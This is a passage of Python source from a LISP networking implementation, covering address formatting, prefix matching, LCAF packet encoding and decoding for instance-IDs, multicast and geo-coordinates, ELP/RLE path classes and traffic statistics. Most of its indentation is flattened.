def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
            #endif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
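    #
    # Worked example (editor's sketch): with self = [1000]10.1.0.0/16 and
    # prefix = [1000]10.0.0.0/8, the numeric branch computes shift = 24 and
    # mask = 0xff000000, and 10.1.0.0 & 0xff000000 equals 10.0.0.0, so
    # is_more_specific() returns True. If self had a shorter mask-length
    # than prefix (e.g. /4), the mask-length check would return False.
    #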
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
            if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
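    # Example encoding (editor's sketch): for EID [1000]10.0.0.0/8,
    # lcaf_encode_iid() below returns these bytes (the leading AFI = 16387
    # field in the diagram is written by the caller, not here):
    #
    #   00 00 02 00 00 0a   Rsvd1, Flags, Type = 2, IID mask-len = 0, length
    #   00 00 03 e8         Instance ID 1000
    #   00 01               AFI = 1 (IPv4)
    #   0a 00 00 00         address 10.0.0.0
    #
    # The length of 10 comes from lcaf_length(): 4-byte address + 2 (AFI) +
    # 4 (Instance ID).
    #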
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
        # Get AFI and group address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
        elp_node.address.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp():
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
        # If we did not find a match, this is possibly an ITR. We need to
        # use the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
class lisp_geo():
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
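#
# parse_geo_string() parses a human-readable geo string. Illustrative
# format, inferred from the parser below (not from separate config docs):
# "[<iid>]<lat>-<mins>-<secs>-<N|S>-<lon>-<mins>-<secs>-<E|W>" with an
# optional "-<altitude>" field and an optional "/<radius-km>" suffix,
# for example "[0]37-24-30-N-122-04-57-W-50/10".
#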
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom in (None, "") or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = vincenty(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
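#
# encode_geo() packs this geo object into a Geo-Coordinate LCAF. Flag
# bits used below: 0x40 north latitude, 0x20 east longitude, 0x10
# altitude present, and 0x06 when a radius is encoded (in kilometers).
# decode_geo() is the matching unpacker.
#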
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = ((lat_hi << 16) | socket.ntohs(lat_ms)) / 1000
self.lat_mins = lat_secs / 60
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = ((lon_hi << 16) | socket.ntohs(lon_ms)) / 1000
self.long_mins = lon_secs / 60
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
#
# Structure for Replication List Entries.
#
class lisp_rle_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle():
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = blue(rle_node.rloc_name, html) if \
rle_node.rloc_name != None else ""
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}(L{}){}, ".format(addr_str, "" if port == 0 \
else "-" + str(port), rle_node.level,
"" if rle_node.rloc_name == None else rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
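#
# build_forwarding_list() computes the subset of RLE nodes this system
# replicates packets to. If one of the RLE nodes is a local RLOC, we
# forward to nodes at the next level up in the list; otherwise (an ITR)
# we forward to level-0 nodes (level-128 entries are included in that
# case). Local RLOCs are excluded unless we are an RTR.
#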
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
class lisp_json():
def __init__(self, name, string):
self.json_name = name
self.json_string = string
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (lisp_json_list.has_key(self.json_name)):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
#endclass
#
# LISP forwarding stats info.
#
class lisp_stats():
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
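#
# normalize() renders a packet/byte counter as a short human-readable
# string with an M/B/T suffix once it grows past 6/9/12 digits; smaller
# counts are returned unchanged. Illustrative example: 1234567 prints
# as "1.2M".
#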
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
count = count[0:-10] + "." + count[-10:-7] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int((self.packet_count - last_packets) / rate_diff)
bit_rate = (self.byte_count - last_bytes) / rate_diff
bit_rate = (bit_rate * 8) / 1000000
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version gives you the string above in a pull-down html
# menu and the title string is the string below.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
#
# ETR/RTR decapsulation total packet and error stats. Anytime a new
# lisp_packet.packet_error value is added, a corresponding key string
# needs to be added to this dictionary.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
